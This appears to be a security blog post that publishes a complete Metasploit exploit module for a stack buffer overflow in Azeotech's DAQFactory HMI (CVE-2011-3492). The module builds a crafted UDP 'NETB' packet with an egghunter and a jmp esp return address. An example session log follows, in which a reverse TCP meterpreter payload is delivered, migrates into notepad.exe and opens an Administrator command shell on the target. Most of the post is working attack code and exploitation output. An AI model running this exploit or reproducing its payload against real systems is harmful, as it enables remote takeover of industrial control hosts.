read, write, eXecute…

DaqFactory HMI NETB request stack buffer overflow vulnerability download
##
# $Id: daq_factory_bof.rb 13766 2011-09-20 18:56:21Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
        Rank = GoodRanking

        include Msf::Exploit::Remote::Udp
        include Msf::Exploit::Remote::Egghunter

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'DaqFactory HMI NETB Request Overflow',
                        'Description'    => %q{
                                        This module exploits a stack buffer overflow in Azeotech's DaqFactory
                                product. The specfic vulnerability is triggered when sending a specially crafted
                                'NETB' request to port 20034. Exploitation of this vulnerability may take a few
                                seconds due to the use of egghunter.  This vulnerability was one of the 14
                                releases discovered by researcher Luigi Auriemma.
                        },
                        'Author'         =>
                                [
                                        'Luigi Auriemma',  # Initial discovery, crash poc
                                        'mr_me <steventhomasseeley[at]gmail.com>',  # msf exploit
                                ],

                        'Version'        => '$Revision: 13766 $',
                        'References'     =>
                                [
                                        [ 'CVE', '2011-3492'],
                                        [ 'OSVDB', '75496'],
                                        [ 'URL', 'http://aluigi.altervista.org/adv/daqfactory_1-adv.txt'],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                        'InitialAutoRunScript' => 'migrate -f',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 600,
                                        'BadChars' => "\x00",
                                },
                        'Platform'       => 'win',
                        'Targets'        =>
                                [
                                        [
                                                'DAQFactory Pro 5.85 Build 1853 on Windows XP SP3',
                                                {
                                                        'Ret' => 0x100B9EDF,  # jmp esp PEGRP32A.dll
                                                        'Offset' => 636,
                                                }
                                        ],
                                ],
                        'DisclosureDate' => 'Sep 13 2011',
                        'DefaultTarget'  => 0))

                register_options(
                        [
                                # Required for EIP offset
                                OptString.new('DHCP', [ true, "The DHCP server IP of the target", "" ]),
                                Opt::RPORT(20034)
                        ], self.class)
        end

        def exploit
                connect_udp

                print_status("Trying target #{target.name}...")

                eggoptions ={
                        :checksum => false,
                        :eggtag => 'scar',
                }

                # Correct the offset according to the 2nd IP (DHCP) length
                iplen = datastore['DHCP'].length
                offset = 93-iplen

                if offset >= 80
                        pktoffset = offset - 80
                        finaloffset = target['Offset']-pktoffset
                elsif offset <= 79
                        pktoffset = 80 - offset
                        finaloffset = target['Offset']+pktoffset
                end

                # springboard onto our unmodified payload
                p = Rex::Arch::X86.jmp(750) + payload.encoded
                hunter,egg = generate_egghunter(p, payload_badchars, eggoptions)

                sploit  = "NETB"  # NETB request overflow
                sploit << rand_text_alpha_upper(233)
                sploit << "\x00"  # part of the packet structure
                sploit << rand_text_alpha_upper(offset)  # include the offset for the DHCP address
                sploit << make_nops(2)
                sploit << hunter
                sploit << rand_text_alpha_upper(52-hunter.length-2)
                sploit << [target.ret].pack("V")
                sploit << rand_text_alpha_upper(12)
                sploit << Rex::Arch::X86.jmp_short(-70)
                sploit << egg
                # packetlen needs to be adjusted to a max of 0x400 as per advisory
                sploit << rand_text_alpha_upper(finaloffset-egg.length)

                # The use of rand_text_alpha_upper() ensures we always get the same length for the
                # first IP address. See the following for more details:
                # http://dev.metasploit.com/redmine/issues/5453
                sploit[12,4] = rand_text_alpha_upper(4)

                udp_sock.put(sploit)

                handler
                disconnect_udp
        end

end
example usage
mr_me@neptune daq_factory]$ msfconsole -r daq.rc

IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|`.""'.
  II     6.     .P  :  .' / |  `.  :
  II     'T;. .;P'  '.'  /  |    `.'
  II      'T; ;P'    `. /   |    .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 743 exploits - 374 auxiliary - 81 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
       =[ svn r13720 updated 3 days ago (2011.09.12)

resource (daq.rc)> use exploit/windows/scada/daq_factory_bof
resource (daq.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (daq.rc)> set RHOST 192.168.114.130
RHOST => 192.168.114.130
resource (daq.rc)> set LHOST 192.168.114.1
LHOST => 192.168.114.1
resource (daq.rc)> set LPORT 4444
LPORT => 4444
resource (daq.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.114.1:4444
[*] Trying target Windows universal...
msf  exploit(daq_factory_bof) >
[*] Sending stage (752128 bytes) to 192.168.114.130
[*] Meterpreter session 1 opened (192.168.114.1:4444 -> 192.168.114.130:1186) at 2011-09-15 02:40:24 +1000
[*] Session ID 1 (192.168.114.1:4444 -> 192.168.114.130:1186) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: DAQFactory.exe (2112)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1664

msf  exploit(daq_factory_bof) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  STEVE-ABF32F2B7\Administrator @ STEVE-ABF32F2B7  192.168.114.1:4444 -> 192.168.114.130:1186

msf  exploit(daq_factory_bof) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 3116 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\DAQFactory>